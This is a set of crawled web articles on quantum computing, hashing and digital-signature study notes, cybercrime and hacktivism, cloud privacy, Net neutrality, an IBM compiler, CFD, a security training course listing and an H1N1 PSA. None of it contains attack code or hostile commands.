by NASA and Google. (Photo: D-Wave) It's not known what those qubits are until they begin to interact - or entangle - with other qubits. Based on their entanglements, they become a one or a zero. However, just because a qubit acted as a zero during one calculation, doesn't mean it will act as a zero during the next calculation. It goes back to the original possibility. WPI Prof. 
Germano Iannacchione That's where the quantum computer's power comes into play. A quantum system doesn't work in an orderly, linear way. Instead, its qubits communicate with each other, through entanglement, and they calculate all the possibilities at the same time. That means if a quantum machine has 512 qubits, it's calculating at 2 to the 512th power at the same time. That number is so immense that there are not that many atoms in the universe, according to Rupak Biswas, chief of NASA's Advanced Supercomputing Division. Some physicists theorize that all those calculations are being done in different dimensions. "We're so far outside of our everyday experience," said Germano S. Iannacchione, head of the Physics Department at Worcester Polytechnic Institute. "Common sense doesn't guide us here. We're trying to come up with pictures in our heads of how it works. When you're at the hairy edge of the unknown in physics and you don't have experience and common sense to guide you, you have to rely on the math. That's the only thing you can hold on to." Despite the complexities, D-Wave's Brownell said his company has built quantum computers, using their own quantum processor built with different metals, such as niobium, a soft metal that becomes superconducting when cooled to very low temperatures. One machine, the D-Wave Two, leased by the Universities Space Research Association, is based at NASA's Ames Research Center in Mountain View, Calif. NASA has use of the machine 40% of the time, Google has another 40% and the research association has 20%. Google declined to talk about its work with the system. However, its experiments on the computer have led to debate on whether D-Wave's computer performs any better than classic computing or whether it is a quantum computer at all. NASA, which has had its hands on the D-Wave Two since last September, has only been testing it, Biswas said. His group has been doing high-performance modeling and simulation on problems related to Earth sciences, aeronautics and deep space exploration. "We're still in the early stages," said Biswas, but added that testing is going well. "We are trying to see what it can do. It's not a turnkey situation. It's a very exotic field. It's like in the early days of computing when we had computers with vacuum tubes and card readers." D-Wave's system at NASA may be the first commercially available quantum computer, but it's not the first quantum machine. Basic quantum computers have been built before. In 2000, scientists at the Los Alamos National Laboratory demonstrated a working 7-qubit system. In 2011, Brownell said, D-Wave, to prove it was on the right track, built a quantum computer running 8 qubits. However, the company hasn't proved that its 512-qubit machine works as a quantum computer, and that's because, he said, it simply can't be proven. "These are such complex systems they can't be modeled by all the computers in the world put together," Brownell said. "That will never be completely provable." Paul Benioff, who is credited with being the first to apply the theories of quantum mechanics to computers in the early 1980s while working at the Argonne National Laboratory, is doubtful that D-Wave has built a true quantum computer. "We're a long ways away," he told Computerworld. "It won't happen in my lifetime and I don't intend to die tomorrow." Benioff says it could be 20 to 50 years before anyone is able to get a lot of qubits to work together. 
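To put the "2 to the 512th power" figure quoted above in perspective, a couple of lines of arithmetic are enough. The figure of roughly 10 to the 80th atoms in the observable universe is a commonly cited rough estimate, used here only for scale.

```python
# Size of the state space of 512 qubits versus a rough estimate of the
# number of atoms in the observable universe.
state_space = 2 ** 512
atoms_in_universe = 10 ** 80

print(len(str(state_space)))             # 155 -> a 155-digit number
print(state_space > atoms_in_universe)   # True, by roughly 75 orders of magnitude
```

That gap is why even enumerating such a state space classically is hopeless, and it is the intuition behind the claims made for quantum machines, whether or not any particular device actually exploits it.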
"It's not hard to build [a qubit], but how do you build a whole lot of them and have one over here interact with one way over there?" he asked. "There are a lot of questions out there about whether they are full quantum computers. It could be a step there or it's an offshoot of the right way to go." Iannacchione agrees that D-Wave's system is likely a step toward building a real quantum computer. "They haven't demonstrated the ability to do these huge calculations," he said. "There's no clear evidence that what D-Wave is doing is faster than what a classical computer can do. If they really are creating a quantum computer, it should be hugely faster even if we don't understand what is going on under the hood." That is what is making many people, in both physics and computer science, skeptical about D-Wave's machine. This is so new and out-of-the-box, that they're not even sure if a true quantum computer has been built. And having a quantum computer won't be as easy as adding more racks to a company's data center. A quantum computer has to be completely isolated from everything from radiation to light, heat and even vibrations. It also has to operate at 458 degrees below zero Fahrenheit. "It's the world's most delicate souffl," said Iannacchione. If it's difficult to find software to take advantage of computers running multi-core chips, finding software to run on a quantum machine would be a much bigger issue. Despite the doubts and difficulties associated with quantum computing, Brownell maintains that D-Wave is the first to build a commercial quantum computer that can do large, useful calculations. "The most complex thing ever done by a quantum computer before ours was factoring the number 21 in a laboratory," he said. "This is one of the most important things to happen in computer science in the last 50 years. This becomes a whole new branch of computer science." Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com. Read more about high performance computing in Computerworld's High Performance Computing Topic Center.
<urn:uuid:18cada6a-4484-47a6-91e5-55a0f09c8f0d>
CC-MAIN-2017-04
http://www.computerworld.com.au/article/540764/quantum_rewrites_rules_computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00560-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965737
2,028
3.078125
3
I'll be taking another practice test soon... Hashing and HMACs: A cryptographic hash function produces a hash sum that differs radically if the input is changed even slightly. A hash collision, or “hash clash,” occurs when two different inputs produce the same hash sum output. An HMAC combines a secret key with a hash function so that both the integrity and the authenticity of a message can be verified. Hash Applications: Hashing algorithms are used to verify the integrity of transmissions and passwords. MD5: • 128-bit hash value typically expressed as a 32-character hexadecimal number • 4 rounds of 16 operations for a total of 64 operations • Created by Rivest of MIT • Random data bits (salt) should be added to a password before it is hashed with MD5. Rainbow Tables: RBTs are used to map hash outputs back to input strings. Salting makes RBTs less effective. Secure Hash: A hash is considered to be secure if: • It is computationally infeasible to find the message that corresponds to a digest • No two different messages produce the same hash value. SHA: • Widely used in applications such as TLS, SSL, PGP, SSH, S/MIME, and IPsec. • A small change in input will produce a drastically different hash output. • 224, 256, 384, and 512-bit versions have been published by NIST • Vulnerable because of weak file processing steps and certain math operations in the first 20 rounds. Digital Signatures and PKI: Hashing and asymmetric encryption can be combined to provide encryption and authentication. These attributes are especially effective when implemented in a Public Key Infrastructure system. Hashes and Digital Signatures: A message can be encrypted with the recipient’s public key. The message is then hashed, and the hash is encrypted with the sender’s private key to form the signature. If both users have exchanged their public keys, the recipient will be able to decrypt the message with his private key and the signature with the sender’s public key. The hash of the message can then be recomputed, compared with the decrypted signature, and the message’s integrity verified. A Digital Signature Scheme is composed of three algorithms: • Key generation algorithm to generate a user’s public/private key pair • Signature algorithm that signs the message with a signing key • Signature verification algorithm with a verifying key RSA: RSA uses public/private key cryptography. Keys are typically 1024–2048 bits long. RSA Message Signing: • The sender creates a hash of the message and raises it to the power of d mod n. • The resulting signature is attached to the message • The recipient raises the signature to the power of e mod n, the same modular exponentiation used for encryption. • The recovered hash value is compared with a freshly computed hash and integrity is verified. Attacks on RSA: • Timing Attacks: Measuring decryption times and comparing them against known ciphertexts. Fixed decryption times and blinding, in which the multiplicative property is used so that timing reveals nothing useful, are two methods used to combat timing attacks. • Adaptive chosen-ciphertext attack: Exploits flaws in the PKCS#1 scheme to recover SSL session keys. Addressed by RSA in a PKCS#1 update. • Branch Prediction Analysis (BPA): Attempts to statistically discover private keys by observing simultaneous multithreading patterns. DSA Algorithm: DSA is used to generate digital signatures and verify authenticity. In a DSA scheme, the verifier must know the sender’s public key. DSA requires that keys be bound to users.
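The notes on the avalanche effect, salting and HMACs map directly onto Python's standard library, so a short sketch can make them tangible. This is only an illustration of the concepts above; real password storage should use a slow key-derivation function rather than a bare hash.

```python
import hashlib
import hmac
import os

# Avalanche effect: a one-character change produces a completely different digest.
print(hashlib.sha256(b"message").hexdigest())
print(hashlib.sha256(b"Message").hexdigest())

# Salted password hash: a random salt stored alongside the digest defeats
# precomputed rainbow tables. (Prefer PBKDF2/bcrypt/scrypt in practice.)
salt = os.urandom(16)
stored_digest = hashlib.sha256(salt + b"p@ssw0rd").hexdigest()

# HMAC: a shared secret key plus a hash function authenticates a message,
# so a tampered message or a forger without the key is detected.
key = os.urandom(32)
tag = hmac.new(key, b"transfer 100 to alice", hashlib.sha256).hexdigest()
print(tag)
```

Verification on the receiving side recomputes the HMAC with the same key and compares tags; if either the key or the message differs, the tags will not match.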
<urn:uuid:1edfba05-0ac4-441e-9c19-74b37b5173f7>
CC-MAIN-2017-04
http://networking-forum.com/viewtopic.php?p=175365
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00284-ip-10-171-10-70.ec2.internal.warc.gz
en
0.880416
733
3.734375
4
This month (December 2010) has seen the mainstream media alive with stories of hacktivists attacking payment websites, including Visa, MasterCard and PayPal, in response to those organisations' refusal to take payments in support of the WikiLeaks website. Every day we hear stories of cybercriminals stealing money and cyberterrorists causing mayhem, alongside state sponsored cyberwarfare as nations battle it out on line. The reality is more complicated. Whilst these stories make good headlines the truth is often more disturbing; but what exactly is the truth behind cybercrime, cyberwarfare, cyberterrorism and hacktivism? What do you need to know and what do you need to do to deal with the problem? Cyberspace, cybercrime, cyberterrorism, cyberwars and hacktivism Most people would agree that the internet and the world wide web is generally a force for good. The free flow of information, ideas and commerce have taken a basic tool for sharing research data and propelled it into being a vital part of every day life. Hoever, like all aspects of life there is a darker side, and so it is with the internet. Criminals and malcontents are always looking for new ways to build income or conduct their activities and the internet gives them, on a plate, opportunities that few could have imagined. Cyberspace is a term that was originally coined by William Gibson in 1982 and was made popular in his novel released two years later called Neuromancer. Cyber has now captured the public’s imagination as the term to use when referencing a whole host of activities taking place on the internet: - Any crime that takes place within cyberspace is now deemed to be a cybercrime - Interstate information battles are now deemed to be cyberwars - …and terrorists are now able to conduct cyberterrorism from the comfort of their own homes The scale of cybercrime is difficult to assess. What is certain is that for many people it is a real and present problem, but remains under-reported to the authorities for reasons of embarrassment, ignorance or a lack of faith in the authorities to investigate any possible offences. Some organisations have attempted to gauge the problem; in 2008 the ACPO (UK-based Association of Chief Police Officers organisation) National Strategic Assessment stated “Online fraud generated £52 billion worldwide in 2007” (ACPO, 2008) and in 2004 the global cost of malware and viruses was estimated at “between $169bn and $204bn” (BNAC, 2007) In contrast, cyberterrorism has been defined by the US National Infrastructure Protection Centre, now part of the Department for Homeland Security as, ”a criminal act perpetrated through computers resulting in violence, death and/or destruction, and creating terror for the purpose of coercing a government to change its policies” (Wilson, 2003). Herein lays an interesting debate. I would suggest that we see very few criminal acts that truly fit into this definition. The often-cited examples of the Estonian and Georgian governments, attacked in 2007/8 as part of a ‘cyberwar’, could arguably be categorised as aggressive hacktivism rather than cyberterrorism as defined by the Department for Homeland Security—and certainly not cyberwar. Indeed, latest research indicates that the attacks, which affected some government agencies, emanated from hackers based in Russia acting on their own initiative rather than being a state sponsored punch up. So when does cybercrime become cyberterrorism, and where does online protesting, often called hacktivism, come into play? 
Hacktivism is a portmanteau word—combining hacking and activism in one term. It means the use of digital tools in the pursuit of political ends and normally results in a plethora of mainly annoying attacks such as defacement of websites and the stealing of low-level information. Rarely does it result in what could be described as cyberterrorism. That said, there is no doubt that aggressive hacktivism is on the rise. In January 2009 the United States Department of Homeland Security released an internal intelligence and assessment document entitled “Leftwing Extremists Likely to Increase Use of Cyber Attacks over the Coming Decade” that was subsequently put into the public domain by the Federation of American Scientists. In this document is a very telling quote from an unnamed radical activist group, “…in today’s technological age, computer systems are the real front doors to companies. So instead of chaining ourselves together in the physical doorways of businesses we can achieve the same effect from the comfort [sic] our armchairs….” Computers now form a new front line for such groups. As many in law enforcement know, when radical groups carry out direct action such as rushing through a targeted organisation’s front reception to access their offices the criminal damage that takes place is often a mask for a more sinister attack such as the planting of key logging devices or the download of data masked by the cacophony of the direct action. Less visible are the attacks that these groups execute across the internet. We are now seeing political activists using the same hacking tools and technologies as cybercriminals. There are no boundaries to the use of technology to meet their objectives—the only limit appears to be the imagination of the criminal, hacktivist or terrorist group. The next article in this series will cover the use of the internet by radical groups and the sinister use of open source intelligence gathering. ACPO. (2008). National Strategic Assessment. ACPO. BNAC. (2007). British-North American Committee, Cyber Attack: A Risk Management Primer for CEOs and Directors. BNAC. Wilson, C. (2003). Computer Attack and Cyber Terrorism: Vulnerabilities and Policy Issues for Congress. CRS Web. Federation of American Scientists. Leftwing Extremists Likely to Increase Use of Cyber Attacks over the Coming Decade. Available at http://www.fas.org/irp/eprint/leftwing.pdf Last accessed 9th December 2010
<urn:uuid:91e752f4-c9e7-43b6-a2bd-c33af5262bdf>
CC-MAIN-2017-04
http://www.bloorresearch.com/analysis/cybercrime-cyberwars-cyberterrorism-and-hacktivism-p1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00284-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950644
1,239
2.96875
3
With programs such as iCloud, Evernote, and Expensify becoming ever more popular, and people beginning to store more and more of their personal information on the web, those using cloud computing are beginning to wonder whether or not their information is as safe as they originally believed. Sites that use dedicated server colocation or dedicated server hosting are not completely immune to hacks, but as far as the storage of information goes, they are some of the safest types of hosting on the market. Larger sites, though, such as Facebook and Google, have their own data centers in which they keep all stored information. The issue with having all of your information saved in a cloud isn’t exactly the risk of a hacker breaking in and stealing all of your information; it’s what large companies, like Facebook and Google, might do with all of that stored information. Facebook has come under fire for repeatedly violating user rights by distributing user data, and Google has openly stated that it is opposed to privacy. However, both claim that users have full control of their data; that they retain ownership of everything that is uploaded. Google states that it “does not claim any ownership in any of the content…that you upload,” and Facebook states that “You own all content and information you post on Facebook.” However, user rights are still violated, and users continue to question the state of their online privacy. Technically, the U.S. has no legitimate data privacy or cloud regulation laws. It’s essentially a minimally enforced free-for-all. Since nothing truly prohibits companies from behaving badly, they do what they will with the information on their sites until someone raises a fuss about it. They say that it is better to act now and ask for forgiveness later, but should this be the case with personal information? Until the FTC and other regulators around the world adopt strong rules, cloud users should simply be aware of the companies they are choosing to use and be wary of putting all their information on the web. While no one should necessarily give up Facebook or abandon their Gmail, they may want to consider what information they are sending across the web. Always ask yourself who owns the data after you upload it. Check out company policies. Make sure that your data won’t be used for research you don’t approve of and that you won’t face a copyright infringement suit should you use your own content again later. Also reconsider storing all confidential documents on the web. While clouds are fairly secure, they are better for storing music and photo files, not Social Security numbers, old tax forms, etc. There is no doubt that stricter regulations will be imposed on companies utilizing cloud computing for their sites. However, cloud computing is still too new for anything to be definite. Until then, just remain aware of what you are putting on the web, and you should be okay. This content provided by TheTechUpdate.com.
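One practical response to the advice above about confidential documents is to encrypt files on your own machine before they ever reach a cloud service. The sketch below is a hedged illustration only: it assumes the third-party "cryptography" package is installed, the filename is hypothetical, and key management is left entirely to the reader.

```python
from cryptography.fernet import Fernet  # pip install cryptography

# Generate a key and keep it somewhere safe -- NOT in the same cloud account.
key = Fernet.generate_key()
fernet = Fernet(key)

# Encrypt a hypothetical sensitive document before uploading it.
with open("tax_return_2011.pdf", "rb") as source:
    ciphertext = fernet.encrypt(source.read())

with open("tax_return_2011.pdf.enc", "wb") as target:
    target.write(ciphertext)   # upload the .enc file, not the original

# Later, fernet.decrypt(ciphertext) with the same key recovers the document.
```

With client-side encryption the provider only ever stores ciphertext, so questions about who "owns" or mines the uploaded content matter far less for those particular files.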
<urn:uuid:d0c0d214-3b7a-4ef2-b39b-cb99ac86bec8>
CC-MAIN-2017-04
https://www.404techsupport.com/2011/10/the-state-of-cloud-computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00102-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960569
611
2.6875
3
Some people will tell you that the recent U.S. Court of Appeals ruling striking down the U.S. Federal Communications Commission's rules about Net neutrality was an unmitigated disaster for consumers and Internet innovation, and that over the long term it will quash innovation, cost consumers more, curtail competition, and put everyone at the mercy of big ISPs like Verizon and Comcast. The people who say that are only half right. The ruling was a disaster, but not quite an unmitigated one. Everything Net neutrality advocates say about the long-term effects of the ruling are likely true -- but there's still time to do something about it, if the FCC is willing to put up a fight. It's not clear yet whether the FCC will do that. To understand why the ruling is potentially so disastrous, let's take a step back and look at the court ruling. The concept of Net neutrality has governed the way the Internet has worked since its inception. It means that ISPs can't discriminate among the traffic they carry, treating it all equally. For example, they can't put YouTube traffic onto a fast lane, while putting the traffic of smaller, little-known competitors on a slow-as-a-snail lane. The idea is that all traffic is created equal, and all companies and consumers get an equal shot at using the Internet's pipes. Up until now, Net neutrality has governed the Internet because that was the Internet's founding ethos. But it has also worked that way because of a long-standing legal concept called "common carrier" that governs telecommunications and other services. Applied to Internet infrastructure, it means that all traffic must be treated equally. ISPs have long ached to change the rules of the game. They have advocated for being allowed to deliver traffic to consumers based on how much money websites pay them -- faster delivery for more money. The first crack in Net neutrality appeared a dozen years ago. In 2002, the FCC under President George W. Bush made a decision that led in a straight line to this week's ruling to strike down the FCC's Net neutrality rules. The FCC back then decided to classify broadband as an "information service" instead of a "telecommunications service." That's important, because information services are exempt from common carrier requirements, while telecommunications services aren't. Still, Net neutrality has ruled since then. Under President Obama, the FCC has been generally supportive of Net neutrality, and in 2010, it issued the Open Internet Order, which said that ISPs could not block traffic of any types of services and that it could not discriminate among traffic by putting some in a fast lane and some in a slow lane. Verizon challenged it, and this week a U.S. Court of Appeals struck it down, based on the FCC's 2002 decision to categorize broadband as an "information service." Judge David Tatel said that the Open Internet Order should be overturned because "the Commission has chosen to classify broadband providers in a manner that exempts them from treatment as common carriers" -- in other words, as an information service, not a telecommunication service. What might be the effects of the ruling? Well-funded websites will be able to pay extra to have their traffic delivered speedily, making it much more difficult for startups and competitors to survive. In the long run, that means less competition and less innovation. Established services like Netflix will thrive because they'll be able to pay ISPs and pay big. 
Other services may wither and die, if they even get to start at all, because they'll be at a competitive disadvantage. Consumers may end up paying more for services. For example, if Netflix pays the ISPs to deliver video more quickly, Netflix will need to get that money from somewhere, and that will likely mean higher subscription fees. ISPs could also favor websites and services they own over others. Comcast, for example, owns NBC, and could give that network's websites and online services precedence over NBC's competitors. ISPs could black out entire websites and services. This isn't as far-fetched as it might seem, and there is already a precedent for it. Last summer, Time Warner Cable and CBS were locked in an exceedingly nasty financial dispute about Time Warner Cable's payments to CBS for content. Time Warner Cable went nuclear and blacked out CBS broadcasts to its subscribers for weeks until the disagreement was settled. Now, with Net neutrality struck down, an ISP could do the same thing to a website, blocking access to all Google services unless Google paid what the ISP wanted, for example. What will be the likely result of all this? A balkanized Internet that bears no resemblance to the freewheeling network that has revolutionized the way people live, work and communicate, while fueling massive economic growth. But the FCC can do something about the ruling, and should. The court didn't give Verizon everything it wanted -- the court said that the FCC did, in fact, have the authority to regulate broadband traffic, even though it had exceeded its authority with the Open Internet Order. As a first step, the FCC should appeal the decision. But that's not enough, because another judge may well rule that the FCC exceeded its authority. The FCC should also come up with a set of Net neutrality regulations that don't depend upon common carrier precedents, and therefore might pass court muster. Even better would be the FCC reclassifying broadband as a telecommunications service that must follow common carrier rules. That would re-establish full Net neutrality. It's what should have been done back in 2002. Doing that would infuriate congressional Republicans and unleash the ISPs' lobbyists and political might in an all-out war against the FCC. Scott Cleland, who runs NetCompetition.org, which represents broadband carrier interests, made it clear that that's exactly what would happen. Computerworld quotes him as saying, "It would be regulatory World War III." But if that's what it takes, that's what needs to be done. Doing anything less would amount to an abdication of the FCC's responsibility and allow the Internet as we know it to die a slow death. Read more about internet in Computerworld's Internet Topic Center.
<urn:uuid:6f3d24d5-1ac2-461a-b062-55432903d174>
CC-MAIN-2017-04
http://www.computerworld.com.au/article/536077/preston_gralla_there_time_fix_net_neutrality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00524-ip-10-171-10-70.ec2.internal.warc.gz
en
0.970054
1,265
2.921875
3
Beyond the Script: Practical Problem Solving Techniques for the Security Professional Problem solving and non-linear thinking are critical skills in the network security profession. These skills are hard learned, and often even more difficult to practice. This course will provide you with an opportunity to carry out a variety of attacks on a controlled system. You will solve problems through a collection of hands-on "capture-the-flag" scenarios with built-in challenges designed to test and expand your thought process. You will learn how to tackle these challenges from a practical problem-solving standpoint. Along the way we will discuss real-life scenarios and dissect the thought processes required to achieve success in even the most daunting situations. Students will walk away with over $200 worth of tools utilized during the course. From the start of the course, a set of challenges will be available for the students to participate in and solve. The practical application portion of this course will provide students with time to work on these challenges with the help of the instructors. These challenges will be in the form of a multistage challenge box that will require students to leverage the techniques and skills learned over the previous day. This could include physical locks, RFID replays gathered from around the conference, SCADA/ICS devices to hack and manipulate, etc. Challenges will be diverse and designed to stretch students to work together to leverage each other's strengths in order to be successful. In this course you will: - Practice or learn basic penetration testing skills. - Perform network enumeration and attack. - Capture and replay RFID tag information. - Analyze wireless signals using software defined radios. - Circumvent physical access controls. - Solve complex problems both individually and as part of a team. - Assessing networks for vulnerabilities and exploitation. - Web application testing. - ICS assessment and exploitation. - Radio Frequency Identification - Sniff, Clone and Replay. - A fun and interesting homework assignment. - Basic lock picking techniques. - Physical Access Control Systems, getting into where you aren't supposed to be. - Wireless penetration testing. - Software Defined Radio - Pulling information from thin air. - Practical application of what you have learned. Who Should Take this Course This course is designed for system defenders, system and network administrators, red teamers and penetration testers. Experience with system administration, penetration testing tools, and defensive measures will be helpful, but not required. A willingness to learn new ways of thinking, solving problems and working in a team is essential. What Students Should Bring - Students must have a laptop with administrator access capable of running virtual machines. - RJ-45 port or Wired Network Adaptor. - Standard open USB port for use during course. What Students Will Be Provided With - RTL-SDR with Antenna - Sparrows Mace Picks - Flash drive with course materials and other tools - Practice locks - Demo networks - Custom Control System Jeremy "CrYpT" Dodson has been involved in Information Technology for over 20 years, with a focus in Information Security for 18 years. He is a United States Air Force Veteran who has served in support of the National Security Agency, Defense Information Systems Agency, European Command Air Force, Department of Energy and Department of Labor. He has also consulted with HP, DELL, and various other Fortune 500 IT companies.
Jeremy has presented at and assisted in conference organization for several INFOSEC conferences in the US. He is a Co-Founder of Curious Codes along with Ryan Clarke, Casey Clarke, and Jay Korpi. Curious Codes is an organization designed to teach cryptography and cryptanalysis through community-based events. The mission behind Curious Codes is to promote curiosity and creative thought processes through fun and engaging casual crypto experiences. Ryan "1o57" Clarke self-identifies as a hacker. Currently working as a consultant for the Department of Energy, Mr. Clarke has formerly held positions with multiple three-letter agencies both in and out of the Department of Defense. Mr. Clarke is also a former member of the Advanced Programs Group at Intel, and the Professor of Robotics and Embedded Systems at the University of Advancing Technology. Mr. Clarke has consulted for the Department of Energy, the Department of the Interior, several Fortune 50 companies, and multiple domestic and international organizations. Mr. Clarke is also the official cryptographer and puzzle master for the DEF CON security conference, and is one of the conference organizers. For DEF CON Mr. Clarke created the Hardware Hacking Village, the LosT@Defcon Mystery Challenge, the conference badges, and other events and activities which include aspects of network intrusion and security, social engineering, RED and BLUE team testing, mathematics, linguistics, physical security, and various other security and hacker related skillsets. For his work with DEF CON Mr. Clarke has been featured by Wired, Forbes, the Register, CNET, and various other media outlets. Mr. Clarke's academic background and multiple degrees include computational mathematics, linguistics, cryptography, electrical engineering, and computer systems engineering. Mike "Anch" Guthrie currently works on a Red Team for an agency with a three-letter acronym. It's not secret squirrel or hush-hush; he just doesn't like to talk about himself very much. He has 15 years of experience in penetration testing and cyber security with a background in control systems and security architecture.
<urn:uuid:cd37ca47-1b8e-4e63-a912-b103fb2cf991>
CC-MAIN-2017-04
https://www.blackhat.com/asia-17/training/beyond-the-script-practical-problem-solving-techniques-for-the-security-professional.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00550-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929523
1,110
2.8125
3
IBM announces the public availability of Milepost GCC, an open-source machine learning compiler that IBM says allows applications to be developed, tested and optimized 10 times faster than current tools. IBM announced June 3 the public availability of Milepost GCC, a first-of-its-kind open-source machine learning compiler. The Milepost GCC compiler "intelligently optimizes applications, translating directly into shorter software development times and bigger performance gains," IBM officials said in a news release. IBM's Research Lab in Haifa, Israel, worked with academia and private industry in the European Union to polish the new compiler, which, unlike commercially available compilers, employs artificial intelligence to tweak individual pieces of code. With the compiler, applications can be developed, tested and optimized 10 times faster than with current tools, according to IBM. Moreover, performance of the software programs can be improved by an average of 18 percent, IBM officials said. These improvements are significant, given that the average company "devotes 30 to 50 percent of its entire technology infrastructure to the development and testing of software," according to IBM. IBM reported that it experienced the 18 percent performance improvement on embedded-application benchmarks conducted on IBM System p servers. The new compiler is a result of collaboration between IBM and its partners in the European Union-funded Milepost consortium. IBM officials said the compiler is expected to "reduce time-to-market for new software designs. ... For example, when a company wants to develop a new mobile phone, it normally takes application developers many months to get their software running at an acceptable level of performance. Milepost GCC can reduce the amount of time it takes to reach that level by a factor of 10." "Our technology automatically learns how to get the best performance from the hardware – whether mobile phones, desktops or entire systems, the software will run faster and use less energy," Bilha Mendelson, manager of code optimization technologies at IBM Research Haifa, said in the release. "We opened the compiler environment so it can access artificial intelligence and machine learning guidance to automatically determine exactly what specific optimizations should be used and when to apply them to ramp up performance." "We've developed a more cost-effective development process where you can choose to integrate additional functionality or use less power in your current system," Milepost Project Coordinator Mike O'Boyle, professor of computer science at the University of Edinburgh's School of Informatics, said in the release. "Previously, the same devices could only support a limited list of features while still maintaining a high level of performance. Significantly boosting an application's performance means there's now more room for added functionality while maintaining high performance." According to the release: As a by-product of the Milepost technology, the consortium has launched a code-tuning web site available to the development community. Developers can upload their software code to the site and automatically get input on how to tune their code so it runs faster. The Milepost GCC compiler is available to everyone as of June 25 from the consortium's website http://www.milepost.eu. The project consortium includes the IBM Haifa Research Lab, Israel; the University of Edinburgh, UK; ARC International Ltd., UK; CAPS Enterprise, France; and INRIA, France.
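Neither the article nor the release spells out how the machine-learning guidance works in practice. As a rough, hedged sketch of the general idea behind such tools, iterative compilation, the following Python script tries several GCC flag sets against a benchmark and keeps the fastest. The flag sets, benchmark file name and timing loop are illustrative assumptions, not Milepost GCC's actual mechanism, which predicts good optimizations from learned program features rather than brute-force search.

```python
# Illustrative sketch of iterative compilation: try candidate GCC flag sets,
# measure run time of a benchmark, and keep the fastest configuration.
# The flag sets, benchmark, and timing loop are assumptions for illustration.
import subprocess
import time

CANDIDATE_FLAG_SETS = [
    ["-O2"],
    ["-O3"],
    ["-O3", "-funroll-loops"],
    ["-O2", "-fomit-frame-pointer", "-ftree-vectorize"],
]

def measure(flags, source="benchmark.c", runs=3):
    """Compile `source` with `flags` and return the best wall-clock run time."""
    subprocess.run(["gcc", *flags, source, "-o", "bench"], check=True)
    best = float("inf")
    for _ in range(runs):
        start = time.perf_counter()
        subprocess.run(["./bench"], check=True)
        best = min(best, time.perf_counter() - start)
    return best

def pick_best_flags():
    results = {tuple(f): measure(f) for f in CANDIDATE_FLAG_SETS}
    best = min(results, key=results.get)
    return list(best), results

if __name__ == "__main__":
    flags, _ = pick_best_flags()
    print("fastest flag set:", " ".join(flags))
```

A learned model, as described above, replaces the exhaustive timing loop with a prediction of which flags will pay off for a given program, which is where the claimed 10x reduction in tuning time comes from.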
<urn:uuid:bbff49c8-33d6-4a6e-bc4c-c73d6bf0528b>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Application-Development/IBM-Delivers-Smart-OpenSource-Compiler-695460
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00368-ip-10-171-10-70.ec2.internal.warc.gz
en
0.89431
722
2.53125
3
Computational fluid dynamics (CFD) is a sophisticated computer modeling technique that allows engineers to simulate the flow of gases and liquids, and predict fluid-structure interaction. CFD provides deeper insights into the design, allowing the user to assess what will happen under a given set of circumstances. Being able to work out kinks and flaws prior to prototyping and physical testing is an obvious benefit, yet many feel that CFD is either too slow, too complex or too expensive for mainstream design use. According to a recent article at Design World, those objections are outdated and need to be re-examined. In order to set the record straight, Dr. Ivo Weinhold, product marketing manager at Mentor Graphics, Mechanical Analysis Division, presents "The five myths of CFD." Dr. Weinhold explains that these "myths are standing in the way of greater use in the early phases of mechanical design [and] help explain why only about 30,000 out of over 1 million mechanical design engineers worldwide use CFD to simulate fluid flow inside and around their products." He maintains that while these myths may have held merit 10 years ago, times have changed, and CFD has become more user-friendly, quicker, and easier on the pocket-book. Here is a quick rundown on the big five:
Myth #1: CFD is too difficult to be used in the design process
Myth #2: CFD takes too long to use during the design process
Myth #3: CFD is too expensive to be used by mechanical engineers
Myth #4: You can't directly use your CAD model to do CFD analysis
Myth #5: Most products don't need CFD analysis
This is a must-read article for all you design engineers out there or anyone related to the industry.
<urn:uuid:7fac5dea-9403-49ad-b069-c3f0675a11b6>
CC-MAIN-2017-04
https://www.hpcwire.com/2010/10/13/not_your_parents_cfd/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00000-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945035
380
3.1875
3
The cable industry is set to help warn Americans about the H1N1 virus, better known as the swine flu, with the National Cable & Telecommunications Association distributing government public service announcements (PSAs) and NCTA members pledging to air the spots. The cable industry is working to assist the U.S. Department of Health and Human Services (HHS) in increasing awareness and promoting the prevention of the swine flu. While the swine flu is not as big a threat as the avian flu, which HHS describes as “lethal,” it can produce more severe illnesses than the typical flu. According to HHS: “This year, the H1N1 (swine) flu virus may cause a more dangerous flu season with a lot more people getting sick, being hospitalized and dying than during a regular flu season. H1N1 (swine flu) is a new virus first seen in the United States. It is contagious and spreads from person to person. Like seasonal flu, illness in people with H1N1 can vary from mild to severe.” “The upcoming flu season, and the prospect of additional widespread outbreaks of the H1N1 virus, could become disruptive to the everyday lives, health and welfare of millions of Americans,” noted Kyle McSlarrow, president and CEO of the NCTA. “With cable’s ability – through thousands of local cable systems and scores of ad-supported cable networks – to reach the vast majority of American households, we think it’s critical to add our resources to the government’s efforts to help all Americans avoid the flu and other infectious diseases.” A satellite feed will be available on Oct. 13 from 2-2:30 p.m. EST for cable operators and programmers to “downlink” the PSAs. Information on satellite coordinates and other ways of obtaining the PSAs is available from the NCTA’s Communications & Public Affairs Department by contacting Helen Dimsdale at 